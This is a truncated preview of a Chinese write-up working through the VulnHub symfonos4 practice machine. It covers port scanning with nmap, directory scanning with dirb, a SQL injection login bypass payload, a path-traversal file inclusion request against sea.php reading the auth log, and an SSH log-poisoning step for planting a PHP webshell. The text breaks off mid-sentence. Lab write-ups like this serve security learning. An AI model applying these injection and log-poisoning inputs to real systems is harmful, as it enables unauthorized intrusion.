文章预览
本周实践的是vulnhub的symfonos4镜像, 有两个阻塞点,又是不抛弃不放弃的一天, 下载地址,https://download.vulnhub.com/symfonos/symfonos4.7z, 用virtualbox导入成功, console上直接能看到靶机的ip地址,192.168.0.191, 接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.191, 发现靶机开了22端口的ssh服务、80端口的http服务, 对http服务进行php文件路径扫描, dirb http://192.168.0.191 /usr/share/wordlists/dirb/big.txt -X .php 获取到http://192.168.0.191/atlantis.php, 浏览器访问http://192.168.0.191/atlantis.php, 用户名用'or '1'='1'#,密码随便, 就进来了, 选择hades, 验证文件包含漏洞,http://192.168.0.191/sea.php?file=./../../../../../var/log/auth, 利用ssh登录注入一句话木马, ssh ' '@192.168.0.191, 这里是第一个阻塞点,用kali最新版本,ssh注入一句话木马不成功, 一直提示用户名里有无效字符,猜测是ssh客户端版
………………………………